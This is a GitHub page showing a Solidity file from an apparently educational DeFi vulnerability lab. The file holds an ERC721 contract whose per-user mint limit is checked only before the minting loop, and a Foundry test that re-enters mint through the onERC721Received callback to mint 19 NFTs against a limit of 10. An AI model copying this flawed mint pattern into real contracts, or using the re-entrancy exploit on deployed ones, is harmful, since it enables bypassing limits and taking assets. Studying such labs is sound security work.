forked from SunWeb3Sec/DeFiVulnLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Unprotected-callback.sol
44 lines (36 loc) · 1.31 KB
/
Unprotected-callback.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC721/extensions/ERC721Enumerable.sol";
contract ContractTest is Test {
MaxMint721 MaxMint721Contract;
bool complete;
uint256 maxMints = 10;
address alice = vm.addr(1);
address eve = vm.addr(2);
function testSafeMint() public {
MaxMint721Contract = new MaxMint721();
MaxMint721Contract.mint(maxMints);
console.log("Bypassed maxMints, we got 19 NFTs");
console.log("NFT minted:", MaxMint721Contract.balanceOf(address(this)));
}
function onERC721Received(address, address, uint256, bytes memory) public returns (bytes4) {
if (!complete) {
complete = true;
MaxMint721Contract.mint(maxMints - 1);
}
return this.onERC721Received.selector;
}
receive() external payable {}
}
contract MaxMint721 is ERC721Enumerable {
uint256 public MAX_PER_USER = 10;
constructor() ERC721("ERC721", "ERC721") {}
function mint(uint256 amount) external {
require(balanceOf(msg.sender) + amount <= MAX_PER_USER, "exceed max per user");
for (uint256 i = 0; i < amount; i++) {
uint256 mintIndex = totalSupply();
_safeMint(msg.sender, mintIndex);
}
}
}